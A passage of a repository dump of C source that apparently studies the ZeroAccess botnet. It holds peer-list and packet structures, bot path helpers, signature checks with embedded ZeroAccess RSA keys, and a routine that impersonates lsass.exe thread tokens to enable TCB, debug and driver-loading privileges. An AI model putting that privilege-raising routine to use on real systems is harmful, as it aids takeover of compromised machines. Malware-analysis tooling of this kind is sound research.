Buffer);\n    }\n    return NULL;\n}\n\n/*\n* SfuAdjustCurrentThreadPriv\n*\n* Purpose:\n*\n* Impersonate thread and adjust privileges.\n*\n*/\nBOOL SfuAdjustCurrentThreadPriv(\n    PCLIENT_ID SourceThread\n)\n{\n    BOOL                         cond = FALSE;\n    NTSTATUS                     status = STATUS_UNSUCCESSFUL;\n    HANDLE\t\t\t             hThread = NULL, hToken = NULL;\n    OBJECT_ATTRIBUTES            obja;\n    SECURITY_QUALITY_OF_SERVICE  SecurityQos;\n    TOKEN_PRIVILEGES             *NewState = NULL;\n    ULONG                        uLen;\n\n    do {\n\n        InitializeObjectAttributes(&obja, NULL, 0, NULL, NULL);\n        status = NtOpenThread(&hThread, THREAD_DIRECT_IMPERSONATION, &obja, SourceThread);\n        if (!NT_SUCCESS(status))\n            break;\n\n        SecurityQos.Length = sizeof(SecurityQos);\n        SecurityQos.ImpersonationLevel = SecurityImpersonation;\n        SecurityQos.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;\n        SecurityQos.EffectiveOnly = FALSE;\n        status = NtImpersonateThread(NtCurrentThread(), hThread, &SecurityQos);\n        if (!NT_SUCCESS(status))\n            break;\n\n        status = NtOpenThreadTokenEx(NtCurrentThread(), TOKEN_ADJUST_PRIVILEGES, FALSE, 0, &hToken);\n        if (!NT_SUCCESS(status))\n            break;\n\n        uLen = sizeof(TOKEN_PRIVILEGES) + (6 * sizeof(LUID_AND_ATTRIBUTES));\n\n        NewState = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, HEAP_ZERO_MEMORY, uLen);\n        if (NewState == NULL)\n            break;\n\n        NewState->PrivilegeCount = 6;\n\n        NewState->Privileges[0].Luid.LowPart = SE_TCB_PRIVILEGE;\n        NewState->Privileges[0].Luid.HighPart = 0;\n        NewState->Privileges[0].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n        NewState->Privileges[1].Luid.LowPart = SE_TAKE_OWNERSHIP_PRIVILEGE;\n        NewState->Privileges[1].Luid.HighPart = 0;\n        NewState->Privileges[1].Attributes = 
SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n        NewState->Privileges[2].Luid.LowPart = SE_RESTORE_PRIVILEGE;\n        NewState->Privileges[2].Luid.HighPart = 0;\n        NewState->Privileges[2].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n        NewState->Privileges[3].Luid.LowPart = SE_DEBUG_PRIVILEGE;\n        NewState->Privileges[3].Luid.HighPart = 0;\n        NewState->Privileges[3].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n        NewState->Privileges[4].Luid.LowPart = SE_LOAD_DRIVER_PRIVILEGE;\n        NewState->Privileges[4].Luid.HighPart = 0;\n        NewState->Privileges[4].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n        NewState->Privileges[5].Luid.LowPart = SE_SECURITY_PRIVILEGE;\n        NewState->Privileges[5].Luid.HighPart = 0;\n        NewState->Privileges[5].Attributes = SE_PRIVILEGE_ENABLED_BY_DEFAULT | SE_PRIVILEGE_ENABLED;\n\n        status = NtAdjustPrivilegesToken(hToken, FALSE, NewState, 0, NULL, NULL);\n\n    } while (cond);\n\n    if (hToken != NULL) NtClose(hToken);\n    if (hThread != NULL) NtClose(hThread);\n    if (NewState != NULL) RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, NewState);\n\n    return NT_SUCCESS(status);\n}\n\n/*\n* SfuElevatePriv\n*\n* Purpose:\n*\n* Attempt to elevate current thread privileges by impersonating lsass thread token and adding privileges next.\n*\n*/\nBOOL SfuElevatePriv(\n    VOID\n)\n{\n    BOOLEAN                        WasEnabled;\n    BOOL                           cond = FALSE, bResult = FALSE;\n    NTSTATUS                       status;\n    PSYSTEM_PROCESSES_INFORMATION  ProcessList = NULL, pList;\n    UNICODE_STRING                 uLookupProcess;\n    ULONG                          i;\n\n    do {\n        status = RtlAdjustPrivilege(SE_DEBUG_PRIVILEGE, TRUE, FALSE, &WasEnabled);\n        if (!NT_SUCCESS(status))\n            break;\n\n        ProcessList = 
SfuGetSystemInfo(SystemProcessInformation);\n        if (ProcessList == NULL)\n            break;\n\n        RtlSecureZeroMemory(&uLookupProcess, sizeof(uLookupProcess));\n        RtlInitUnicodeString(&uLookupProcess, L\"lsass.exe\");\n        pList = ProcessList;\n\n        for (;;) {\n\n            if (RtlEqualUnicodeString(&uLookupProcess, &pList->ImageName, TRUE)) {\n\n                for (i = 0; i < pList->ThreadCount; i++) {\n                    bResult = SfuAdjustCurrentThreadPriv(&pList->Threads[i].ClientId);\n                    if (bResult)\n                        break;\n                }\n                break;\n            }\n            if (pList->NextEntryDelta == 0) {\n                break;\n            }\n            pList = (PSYSTEM_PROCESSES_INFORMATION)(((LPBYTE)pList) + pList->NextEntryDelta);\n        }\n\n    } while (cond);\n\n    if (ProcessList != NULL)\n        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, ProcessList);\n\n    return bResult;\n}\n\n/*\n* SfuLoadPeerList\n*\n* Purpose:\n*\n* Load peer list from file.\n*\n*/\nNTSTATUS SfuLoadPeerList(\n    _In_ OBJECT_ATTRIBUTES *ObjectAttributes,\n    _In_ ZA_PEERINFO **PeerList,\n    _In_ PULONG NumberOfPeers\n)\n{\n    BOOL                        cond = FALSE;\n    HANDLE                      hFile = NULL;\n    PVOID                       pData = NULL;\n    NTSTATUS                    status = STATUS_UNSUCCESSFUL;\n    IO_STATUS_BLOCK             iost;\n    FILE_STANDARD_INFORMATION   fsi;\n    SIZE_T                      memIO;\n\n    if ((NumberOfPeers == NULL) || (PeerList == NULL))\n        return status;\n\n    do {\n        status = NtOpenFile(&hFile, FILE_READ_ACCESS | SYNCHRONIZE,\n            ObjectAttributes, &iost, FILE_SHARE_READ,\n            FILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT);\n\n        if (!NT_SUCCESS(status))\n            break;\n\n        RtlSecureZeroMemory(&fsi, sizeof(fsi));\n        status = NtQueryInformationFile(hFile, &iost, (PVOID)&fsi, 
sizeof(fsi), FileStandardInformation);\n        if (!NT_SUCCESS(status))\n            break;\n\n        if ((fsi.EndOfFile.LowPart % sizeof(ZA_PEERINFO)) != 0) {// incomplete/damaged file\n            status = STATUS_BAD_DATA;\n            break;\n        }\n\n        memIO = (SIZE_T)fsi.EndOfFile.LowPart;\n        NtAllocateVirtualMemory(NtCurrentProcess(), &pData, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);\n        if (pData == NULL) {\n            status = STATUS_MEMORY_NOT_ALLOCATED;\n            break;\n        }\n\n        status = NtReadFile(hFile, NULL, NULL, NULL, &iost, pData, fsi.EndOfFile.LowPart, NULL, NULL);\n        if (NT_SUCCESS(status)) {\n            *NumberOfPeers = (ULONG)(iost.Information / sizeof(ZA_PEERINFO));\n            *PeerList = pData;\n        }\n        else {\n            //pData came from NtAllocateVirtualMemory, release it the same way and not through the process heap\n            memIO = 0;\n            NtFreeVirtualMemory(NtCurrentProcess(), &pData, &memIO, MEM_RELEASE);\n            *NumberOfPeers = 0;\n            *PeerList = NULL;\n        }\n\n    } while (cond);\n\n    if (hFile) NtClose(hFile);\n    return status;\n}\n\n/*\n* SfuCreateDirectory\n*\n* Purpose:\n*\n* Native create directory.\n*\n*/\nBOOL SfuCreateDirectory(\n    _In_ OBJECT_ATTRIBUTES *ObjectAttributes\n)\n{\n    NTSTATUS         status;\n    HANDLE           DirectoryHandle;\n    IO_STATUS_BLOCK  IoStatusBlock;\n\n    status = NtCreateFile(&DirectoryHandle,\n        FILE_GENERIC_WRITE,\n        ObjectAttributes,\n        &IoStatusBlock,\n        NULL,\n        FILE_ATTRIBUTE_NORMAL,//za use hidden+system\n        FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n        FILE_OPEN_IF,\n        FILE_DIRECTORY_FILE,\n        NULL,\n        0);\n\n    if (!NT_SUCCESS(status)) {\n        return FALSE;\n    }\n    NtClose(DirectoryHandle);\n    return TRUE;\n}\n"
  },
  {
    "path": "Source/shared/util.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       UTIL.H\n*\n*  VERSION:     1.00\n*\n*  DATE:        15 Jan 2016\n*\n*  ZeroAccess support routines header file.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\n#define T_SIREFEF_DIRECTORY    L\"\\\\Google\\\\Desktop\\\\Install\\\\{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}\\\\#.\\\\\"\n#define T_SHELL_FOLDERS_KEY    L\"%wS\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\User Shell Folders\"\n#define T_LOCAL_APPDATA_VALUE  L\"Local AppData\"\n#define T_GLOBAL_LINK          L\"\\\\GLOBAL??\\\\\"\n\ntypedef struct _ZA_BOT_PATH {\n\tWCHAR szBotPathLocal[MAX_PATH + 1];\n\tWCHAR szBotPathPFiles[MAX_PATH + 1];\n} ZA_BOT_PATH, *PZA_BOT_PATH;\n\nVOID SfuDecodeStream(\n\t_Inout_ unsigned char *stream,\n\t_In_ size_t size,\n\t_In_ unsigned long key\n\t);\n\nBOOL SfuBuildBotPath(\n\t_Inout_ PZA_BOT_PATH Context\n\t);\n\nULONG_PTR SfuWriteBufferToFile(\n\t_In_ PWSTR lpFileName,\n\t_In_ PVOID Buffer,\n\t_In_ SIZE_T Size,\n\t_In_ BOOL Flush,\n\t_In_ BOOL Append\n\t);\n\nBOOL SfuWhois(\n\t_In_ UINT_PTR WhoisSocket,\n\t_In_ ZA_PEERINFO *Peer,\n\t_Inout_ UNICODE_STRING *ReturnedInfo\n\t);\n\nSOCKET SfuWhoisInit(\n\tVOID\n\t);\n\nVOID SfuWhoisClose(\n\t_In_ SOCKET Socket\n\t);\n\nBOOLEAN SfuCalcVolumeMD5(\n\t_Inout_ PBYTE MD5Hash\n\t);\n\nPVOID SfuCreateFileMappingNoExec(\n\t_In_ LPWSTR lpFileName\n\t);\n\nPVOID SfuGetSystemInfo(\n\t_In_ SYSTEM_INFORMATION_CLASS InfoClass\n\t);\n\nBOOL SfuElevatePriv(\n\tVOID\n\t);\n\nVOID SftListThreadPriv(\n\tVOID\n\t);\n\nNTSTATUS SfuLoadPeerList(\n\t_In_ OBJECT_ATTRIBUTES 
*ObjectAttributes,\n\t_In_ ZA_PEERINFO **PeerList,\n\t_In_ PULONG NumberOfPeers\n\t);\n\nBOOL SfuCreateDirectory(\n\t_In_ OBJECT_ATTRIBUTES *ObjectAttributes\n\t);\n"
  },
  {
    "path": "Source/shared/za.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       ZA.H\n*\n*  VERSION:     1.00\n*\n*  DATE:        17 Jan 2016\n*\n*  ZeroAccess common structures and definitions used within all projects.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\ntypedef struct _ZA_PEERINFO {\n\tULONG   IP;\n\tunion {\n\t\tULONG PortAndTimeStamp;\n\t\tstruct {\n\t\t\tULONG   Port : 14;\n\t\t\tULONG   TimeStamp : 18;\n\t\t} DUMMYSTRUCTNAME;\n\t} DUMMYUNIONNAME;\n} ZA_PEERINFO, *PZA_PEERINFO;\n\ntypedef struct _ZA_PACKETHEADER {\n\tULONG   CRC;     // CRC32\n\tULONG   Command; // getL, retL\n\tULONG   SessionID;   // crypto-random\n\tUSHORT  Opt1;\n\tUSHORT  Opt2;\n} ZA_PACKETHEADER, *PZA_PACKETHEADER;\n\ntypedef struct _ZA_FILEHEADER {\n\tULONG\tName;\n\tULONG\tTime;\n\tULONG\tSize;\n\tBYTE\tSignature[128];\n} ZA_FILEHEADER, *PZA_FILEHEADER;\n\ntypedef struct _ZA_PACKET {\n\tZA_PACKETHEADER     Header;\n\tZA_PEERINFO         PeerList[16];\n} ZA_PACKET, *PZA_PACKET;\n\ntypedef struct _ZA_CALLHOME {\n\tULONG   BotID;\n\tULONG   AffMod;\n\tBYTE    Country[2];\n\tBYTE    OsVer;\n\tBYTE    OsFlag;\n\tULONG   AffId;\n\tULONG   CRC; //CRC32\n} ZA_CALLHOME, *PZA_CALLHOME;\n"
  },
  {
    "path": "Source/shared/za_crypto.c",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       ZA_CRYPTO.C\n*\n*  VERSION:     1.01\n*\n*  DATE:        18 Jan 2016\n*\n*  ZeroAccess routines used for cryptography purposes.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#include \"global.h\"\n#include \"ea.h\"\n\n/*\n* SfcVerifyFile\n*\n* Purpose:\n*\n* Verify file to be legit ZeroAccess signed binary.\n*\n*/\nBOOL SfcVerifyFile(\n\t_In_ HCRYPTPROV  hProv,\n\t_In_ HCRYPTKEY hKey,\n\t_In_ MD5_CTX *ctx,\n\t_In_ PBYTE Image,\n\t_In_ DWORD ImageSize\n\t)\n{\n\tHCRYPTHASH          lh_hash = 0;\n\tULONG               CRC, SignSize = 0;\n\tBYTE                e_sign[128];\n\tPBYTE               p_resource_sign;\n\tPIMAGE_NT_HEADERS32 phdr;\n\tBOOL                bResult = FALSE;\n\tLDR_RESOURCE_INFO   resInfo;\n\n\tphdr = (PIMAGE_NT_HEADERS32)RtlImageNtHeader(Image);\n\twhile (phdr != NULL) {\n\n\t\tresInfo.Type = (ULONG_PTR)RT_RCDATA; //type\n\t\tresInfo.Name = 1;           //id\n\t\tresInfo.Lang = 0;          //lang\n\n\t\tp_resource_sign = SfLdrQueryResourceDataEx(Image, &resInfo, &SignSize);\n\t\tif (p_resource_sign == NULL)\n\t\t\tbreak;\n\n\t\tif (SignSize != 128)\n\t\t\tbreak;\n\n\t\tif (!CryptCreateHash(hProv, CALG_MD5, 0, 0, &lh_hash))\n\t\t\tbreak;\n\n\t\tCRC = phdr->OptionalHeader.CheckSum;\n\n\t\tmemcpy(e_sign, p_resource_sign, sizeof(e_sign));\n\t\tmemset(p_resource_sign, 0, sizeof(e_sign));\n\n\t\tphdr->OptionalHeader.CheckSum = 0;\n\n\t\tMD5Update(ctx, Image, ImageSize);\n\n\t\tphdr->OptionalHeader.CheckSum = CRC;\n\t\tmemcpy(p_resource_sign, e_sign, sizeof(e_sign));\n\n\t\tMD5Final(ctx);\n\n\t\tif (!CryptSetHashParam(lh_hash, 
HP_HASHVAL, (const BYTE *)&ctx->digest, 0)) {\n\t\t\tCryptDestroyHash(lh_hash);\n\t\t\tbreak;\n\t\t}\n\n\t\tbResult = CryptVerifySignatureW(lh_hash, (const BYTE *)&e_sign, sizeof(e_sign), hKey, 0, 0);\n\t\tCryptDestroyHash(lh_hash);\n\t\tbreak;\n\t}\n\treturn bResult;\n}\n\n/*\n* SfcIsFileLegit\n*\n* Purpose:\n*\n* Verify file to be legit ZeroAccess signed binary.\n*\n* Verification algorithm (as of the current version)\n*\n* 1. Open dll file, read it to the allocated buffer, read extended attribute VER, \n*    containing retL packet data regarding file FileName, TimeStamp, FileSize, \n*    Signature (unused in this verification);\n*\n* 2. Import required RSA key (hardcoded in the bot);\n* \n* 3. Calc MD5 for FileName+TimeStamp+FileSize values;\n* \n* 4. Find resource [1] in dll file, which is embedded signature used to check;\n*\n* 5. Remember PE header CRC value, set it to zero in PE file buffer;\n* \n* 6. Copy embedded signature [1] to preallocated buffer, zero it in PE file buffer;\n*\n* 7. Update MD5 for PE file buffer (excluding PE CRC and signature);\n*\n* 8. Use result MD5 as hash value; \n*\n* 9. 
Verify embedded signature.\n*\n* If any of the above fails, the file is not legit in ZeroAccess's opinion.\n*\n* If you copy ZeroAccess downloaded files without copying EA data, they cannot be verified.\n*\n*/\nNTSTATUS SfcIsFileLegit(\n\t_In_ LPWSTR lpFileName,\n\t_In_ PBYTE BotKey,\n\t_In_ DWORD BotKeySize\n\t)\n{\n\tBOOL                cond = FALSE;\n\tPVOID               pBuffer;\n\tMD5_CTX             context;\n\tZA_FILEHEADER       zaHeader;\n\tHCRYPTPROV          lh_prov = 0;\n\tHCRYPTKEY           lh_key = 0;\n\tHANDLE              hFile = NULL;\n\tNTSTATUS            status = STATUS_UNSUCCESSFUL;\n\tOBJECT_ATTRIBUTES   ObjectAttributes;\n\tIO_STATUS_BLOCK     IoStatusBlock;\n\tUNICODE_STRING      usFileName;\n\tSIZE_T              memIO = 0;\n\n\tif (\n\t\t(lpFileName == NULL) ||\n\t\t(BotKey == NULL) ||\n\t\t(BotKeySize == 0)\n\t\t)\n\t{\n\t\treturn status;\n\t}\n\n\n\tRtlSecureZeroMemory(&usFileName, sizeof(usFileName));\n\n\tdo {\n\n\t\tif (RtlDosPathNameToNtPathName_U(lpFileName, &usFileName, NULL, NULL) == FALSE)\n\t\t\tbreak;\n\n\t\tInitializeObjectAttributes(&ObjectAttributes, &usFileName, OBJ_CASE_INSENSITIVE, NULL, NULL);\n\t\tstatus = NtOpenFile(&hFile, FILE_GENERIC_READ, &ObjectAttributes, &IoStatusBlock,\n\t\t\tFILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,\n\t\t\tFILE_NON_DIRECTORY_FILE | FILE_SYNCHRONOUS_IO_NONALERT\n\t\t\t);\n\n\t\tif (!NT_SUCCESS(status))\n\t\t\tbreak;\n\n\t\tRtlFreeUnicodeString(&usFileName);\n\n\t\tRtlSecureZeroMemory(&zaHeader, sizeof(zaHeader));\n\t\tif (!SfNtfsQueryFileHeaderFromEa(hFile, &zaHeader)) {\n\t\t\tstatus = STATUS_EA_LIST_INCONSISTENT;\n\t\t\tbreak;\n\t\t}\n\n\t\tstatus = STATUS_UNSUCCESSFUL;\n\t\tmemIO = zaHeader.Size;\n\t\tpBuffer = NULL;\n\t\tif (\n\t\t\t(NT_SUCCESS(NtAllocateVirtualMemory(NtCurrentProcess(), &pBuffer, 0, &memIO, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE))) &&\n\t\t\t(pBuffer != NULL)\n\t\t\t)\n\t\t{\n\t\t\tif (NT_SUCCESS(NtReadFile(hFile, NULL, NULL, NULL, &IoStatusBlock, pBuffer, 
zaHeader.Size, NULL, NULL))) {\n\t\t\t\tif (CryptAcquireContext(&lh_prov, NULL, MS_DEF_PROV, PROV_RSA_FULL, CRYPT_VERIFYCONTEXT)) {\n\t\t\t\t\tif (CryptImportKey(lh_prov, (const BYTE *)BotKey, BotKeySize, 0, 0, &lh_key)) {\n\t\t\t\t\t\tRtlSecureZeroMemory(&context, sizeof(context));\n\t\t\t\t\t\tMD5Init(&context);\n\t\t\t\t\t\tMD5Update(&context, (UCHAR*)&zaHeader, (UINT)3 * sizeof(ULONG)); //note: ZA_FILEHEADER without signature\n\t\t\t\t\t\tif (SfcVerifyFile(lh_prov, lh_key, &context, pBuffer, zaHeader.Size))\n\t\t\t\t\t\t\tstatus = STATUS_SUCCESS;\n\n\t\t\t\t\t\tCryptDestroyKey(lh_key);\n\t\t\t\t\t}\n\t\t\t\t\tCryptReleaseContext(lh_prov, 0);\n\t\t\t\t}\n\t\t\t}\n\t\t\tmemIO = 0;\n\t\t\tNtFreeVirtualMemory(NtCurrentProcess(), &pBuffer, &memIO, MEM_RELEASE);\n\t\t}\n\t\tNtClose(hFile);\n\t\thFile = NULL;\n\n\t} while (cond);\n\n\tif (hFile != NULL) NtClose(hFile);\n\n\tif (usFileName.Buffer != NULL) {\n\t\tRtlFreeUnicodeString(&usFileName);\n\t}\n\treturn status;\n}\n\n/*\n* SfcValidateFileHeader\n*\n* Purpose:\n*\n* Verify fileheader from retL packet.\n*\n*/\nBOOL SfcValidateFileHeader(\n\t_In_ HCRYPTPROV hCryptoProv,\n\t_In_ HCRYPTKEY hCryptKey,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t)\n{\n\tBOOL bResult, cond = FALSE;\n\tHCRYPTHASH   hCryptHash = 0;\n\tMD5_CTX      ctx;\n\n\tbResult = FALSE;\n\n\tif (FileHeader == NULL)\n\t\treturn FALSE;\n\n\tdo {\n\n\t\tif (!CryptCreateHash(hCryptoProv, CALG_MD5, 0, 0, &hCryptHash))\n\t\t\tbreak;\n\n\t\tMD5Init(&ctx);\n\t\tMD5Update(&ctx, (UCHAR*)FileHeader, (UINT)3 * sizeof(ULONG));\n\t\tMD5Final(&ctx);\n\n\t\tif (!CryptSetHashParam(hCryptHash, HP_HASHVAL, (const BYTE *)&ctx.digest, 0))\n\t\t\tbreak;\n\t\t\n\t\tbResult = CryptVerifySignatureW(hCryptHash, (const BYTE *)&FileHeader->Signature, sizeof(FileHeader->Signature), hCryptKey, 0, 0);\n\n\t} while (cond);\n\n\tif (hCryptHash != 0) {\n\t\tCryptDestroyHash(hCryptHash);\n\t}\n\treturn bResult;\n}\n"
  },
  {
    "path": "Source/shared/za_crypto.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       ZA_CRYPTO.H\n*\n*  VERSION:     1.01\n*\n*  DATE:        18 Jan 2016\n*\n*  ZeroAccess cryptography.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n#pragma once\n\nNTSTATUS SfcIsFileLegit(\n\t_In_ LPWSTR lpFileName,\n\t_In_ PBYTE BotKey,\n\t_In_ DWORD BotKeySize\n\t);\n\nBOOL SfcValidateFileHeader(\n\t_In_ HCRYPTPROV hCryptoProv,\n\t_In_ HCRYPTKEY hCryptKey,\n\t_In_ ZA_FILEHEADER *FileHeader\n\t);\n"
  },
  {
    "path": "Source/shared/za_rkey.h",
    "content": "/*******************************************************************************\n*\n*  (C) COPYRIGHT AUTHORS, 2016\n*\n*  TITLE:       ZA_RKEY.H\n*\n*  VERSION:     1.01\n*\n*  DATE:        18 Jan 2016\n*\n*  ZeroAccess RSA keys.\n*\n* THIS CODE AND INFORMATION IS PROVIDED \"AS IS\" WITHOUT WARRANTY OF\n* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED\n* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A\n* PARTICULAR PURPOSE.\n*\n*******************************************************************************/\n\n#pragma once\n\nstatic const BYTE ZA_key64[152] = {\n\t0x06, 0x02, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00,\n\t0x01, 0x00, 0x01, 0x00, 0xE7, 0x44, 0x50, 0xDA, 0x57, 0xDA, 0x0C, 0x36, 0xA1, 0xFA, 0xE6, 0x9F,\n\t0xF1, 0x87, 0xC4, 0xFC, 0x88, 0x60, 0xAC, 0xFE, 0x94, 0x36, 0xCE, 0xD6, 0x8B, 0x3D, 0xD5, 0xD2,\n\t0xA9, 0x8A, 0xE0, 0x30, 0x30, 0x37, 0x3E, 0xC8, 0xAE, 0xDD, 0x30, 0x5B, 0xDD, 0x3A, 0x62, 0xFC,\n\t0x6D, 0x79, 0x8F, 0x58, 0x75, 0x3D, 0x83, 0x5A, 0x2F, 0x50, 0x52, 0xDA, 0xE8, 0x81, 0xE4, 0xD0,\n\t0x63, 0xB5, 0x96, 0x04, 0x4D, 0xD6, 0x89, 0x3E, 0xBD, 0x06, 0x45, 0x42, 0x34, 0x5B, 0x96, 0xF7,\n\t0x10, 0xC1, 0xFC, 0xCA, 0xA0, 0x0A, 0xA9, 0x3F, 0x3A, 0x1F, 0xD0, 0x9E, 0xFE, 0xE2, 0x91, 0x8F,\n\t0x13, 0xCC, 0xF2, 0x57, 0xB7, 0x90, 0x9F, 0xFA, 0xE3, 0x2B, 0xC4, 0x69, 0x4B, 0xC6, 0xA2, 0x21,\n\t0x5C, 0x99, 0xC1, 0xD3, 0x43, 0x44, 0x30, 0x0D, 0xD8, 0xEB, 0xED, 0x9A, 0x65, 0x4D, 0x99, 0x33,\n\t0x57, 0x93, 0x1A, 0xFA, 0x00, 0x00, 0x00, 0x00\n};\n\nstatic const BYTE ZA_key32[152] = {\n\t0x06, 0x02, 0x00, 0x00, 0x00, 0x24, 0x00, 0x00, 0x52, 0x53, 0x41, 0x31, 0x00, 0x04, 0x00, 0x00,\n\t0x01, 0x00, 0x01, 0x00, 0xA9, 0x60, 0x94, 0x60, 0xE1, 0x74, 0x92, 0x3A, 0xD6, 0xB9, 0x2A, 0x60,\n\t0x7E, 0x89, 0x98, 0x29, 0x57, 0x16, 0x01, 0x89, 0x25, 0x36, 0x3B, 0x99, 0xF3, 0x51, 0xB6, 0xF9,\n\t0xFF, 0xD7, 0x2C, 0x2F, 0x1E, 0x98, 0x3B, 0x4E, 0x5E, 0x4A, 0x1B, 0x39, 0x1E, 0x90, 0x97, 
0x3B,\n\t0x48, 0x71, 0x12, 0x4C, 0x74, 0xED, 0xC4, 0x1F, 0xBE, 0xDE, 0xDA, 0x03, 0x9F, 0xC4, 0x0B, 0x66,\n\t0x52, 0xEF, 0xBD, 0xBD, 0xEA, 0x7F, 0x1F, 0xE2, 0xB2, 0x64, 0xC9, 0x08, 0x97, 0xD3, 0x8C, 0x97,\n\t0xA0, 0xEE, 0xC8, 0x28, 0xB1, 0x1A, 0xDD, 0x46, 0xBB, 0x7D, 0x01, 0xD1, 0x55, 0x7D, 0xB8, 0xE2,\n\t0x4B, 0x9B, 0xFE, 0x66, 0x58, 0xBA, 0x9C, 0x18, 0x58, 0x48, 0xAA, 0xAA, 0x69, 0xFD, 0x3E, 0xE6,\n\t0xA6, 0x83, 0x25, 0xDA, 0x18, 0xA3, 0x43, 0xAC, 0x49, 0x0A, 0xA2, 0x7B, 0xAC, 0x98, 0xFC, 0x25,\n\t0xF7, 0x94, 0xB2, 0xB0, 0x00, 0x00, 0x00, 0x00\n};\n"
  },
  {
    "path": "ZeroAccess.sha256",
    "content": ""
  }
]